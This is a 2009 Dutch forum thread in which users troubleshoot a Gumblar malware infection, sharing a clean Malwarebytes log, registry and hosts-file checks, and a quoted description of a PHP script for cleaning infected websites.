Op dinsdag 11 augustus 2009 16:24 schreef Qwea het volgende:
zodra ik ff weer opnieuw opstart en naar C:\Users\Qwea\AppData\Roaming\Mozilla\Firefox\Profiles\zgodd7xy.default\

ga is formhistory.sqlite er weer !

quote:

Op dinsdag 11 augustus 2009 16:35 schreef CasB het volgende:

[..]

formhistory.sql is het bestand wat firefox aanmaakt waar je zoekhistory in staat, of van formulieren, dus het is niet zo gek dat het er weer staat.

quote:

Op dinsdag 11 augustus 2009 16:34 schreef Qwea het volgende:

[..]

Nou, ja, ehm



Ik snap het alleen niet. Hij zegt wel BAD IFRAME BAD IFRAME! en dan connectie verbreken, en dan vervolgens toch het iframe inladen das krom

malware bytes is wel een poosje bezig zeg al 50 min

quote:

Op dinsdag 11 augustus 2009 16:30 schreef Mr.Noodle het volgende:
Wat zei ik nou net over aVast...

quote:

Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:

[..]

ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie

quote:

Op dinsdag 11 augustus 2009 16:39 schreef Re het volgende:
bij IT zijn ze trouwens ook nog bezig op mijn laptop

quote:

Op dinsdag 11 augustus 2009 16:38 schreef Qwea het volgende:


ik die superantispyware opstarten.. is mijn homepage in IE (wat ik nooit gebruik) google.com, krijg ik opeens een melding dat iets mijn homepage probeert te veranderen naar google.com/redirect nog wat

quote:

Op dinsdag 11 augustus 2009 16:40 schreef Re het volgende:

[..]

ja dat klopt toch, gumbler zorgt ervoor dat je een fake google.com als homepage krijgt

quote:

Malwarebytes' Anti-Malware 1.40
Database versie: 2601
Windows 6.0.6001 Service Pack 1

11-8-2009 16:46:32
mbam-log-2009-08-11 (16-46-32).txt

Scan type: Volledige Scan (C:\|D:\|)
Objecten gescand: 181146
Verstreken tijd: 1 hour(s), 0 minute(s), 42 second(s)

Geheugenprocessen geïnfecteerd: 0
Geheugenmodulen geïnfecteerd: 0
Registersleutels geïnfecteerd: 0
Registerwaarden geïnfecteerd: 0
Registerdata bestanden geïnfecteerd: 0
Mappen geïnfecteerd: 0
Bestanden geïnfecteerd: 0

Geheugenprocessen geïnfecteerd:
(Geen kwaadaardige items gevonden)

Geheugenmodulen geïnfecteerd:
(Geen kwaadaardige items gevonden)

Registersleutels geïnfecteerd:
(Geen kwaadaardige items gevonden)

Registerwaarden geïnfecteerd:
(Geen kwaadaardige items gevonden)

Registerdata bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)

Mappen geïnfecteerd:
(Geen kwaadaardige items gevonden)

Bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)

quote:

Op dinsdag 11 augustus 2009 16:38 schreef Re het volgende:

[..]

ff uitleggen wat je nou precies moet doen om te zorgen dat hij bij opstarten niet weer alles inlaadt uit een vorige sessie

quote:

Op dinsdag 11 augustus 2009 16:53 schreef Mr.Noodle het volgende:

[..]

Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.

Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..

quote:

How to remove the infection from a website

If you manage websites using an FTP program, there is a chance that your sites have become infected. The first thing you must do is change the ftp passwords after your machine has been cleaned.

As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.

I started off using the script by rad-one at http://blog.unmaskparasit(...)page-1/#comment-896.

I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.

Here is what my script does:

1. Recurses through the whole website, excluding files and/or directories of your choosing.
2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
3. All modified files are backed up using the .bak extension.
4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
5. Runs in report mode by default, so you can see which files would be modified.
6. Has a “verbose” option, so you can see how each file will be modified.

It does not change directory permissions. I haven’t got around to investigating that area yet.

You may download it here. (Use at your own risk.)
Instructions for use

1. Place the file scan_files.php at your web document root.
2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
3. Use scan_files.php?v=1 to run it in verbose mode.
4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.
_Bron

quote:

Op dinsdag 11 augustus 2009 17:16 schreef Mr.Noodle het volgende:
Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van alle websites gehaald worden.
[..]

quote:

Op dinsdag 11 augustus 2009 17:08 schreef Qwea het volgende:
hij lijkt niet in mn register voor te komen, ook ;

[ afbeelding ]

[ afbeelding ]

quote:

Op dinsdag 11 augustus 2009 17:22 schreef MissBliss het volgende:
Is er een makkelijke manier om in dat register te kijken dan?

quote:

Op dinsdag 11 augustus 2009 17:21 schreef Mr.Noodle het volgende:

[..]

Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.

Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..

quote:

Op dinsdag 11 augustus 2009 17:25 schreef Qwea het volgende:

[..]

voor die referenties.. moet ik dan alles handmatig nalopen?

[ afbeelding ]

ik kan in services geen gumblar vinden

quote:

Op dinsdag 11 augustus 2009 17:27 schreef MissBliss het volgende:

[..]

Maar hoe weet ik nou ooit of het echt weg is?

quote:

Op dinsdag 11 augustus 2009 17:28 schreef Mr.Noodle het volgende:

[..]

Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..

Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..

quote:

Op dinsdag 11 augustus 2009 17:31 schreef Qwea het volgende:

[..]

Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?

quote:

Op dinsdag 11 augustus 2009 17:33 schreef MissBliss het volgende:

[..]

[ afbeelding ]

quote:

Op dinsdag 11 augustus 2009 17:32 schreef Mr.Noodle het volgende:

[..]

Current user en Local Machine
en check je hosts-file en je hosts.sam

quote:

Op dinsdag 11 augustus 2009 17:40 schreef Qwea het volgende:

[..]

en die host files staan daar ook?

quote:

Op dinsdag 11 augustus 2009 17:38 schreef MissBliss het volgende:
Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo.

quote:

Op dinsdag 11 augustus 2009 17:44 schreef Mr.Noodle het volgende:

[..]

Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.

Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.

quote:

Op dinsdag 11 augustus 2009 17:48 schreef Qwea het volgende:
ik kan geen search files vinden van IE.

Wat is dit eigk?

[ afbeelding ]

quote:

Op dinsdag 11 augustus 2009 17:52 schreef Mr.Noodle het volgende:

[..]

Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.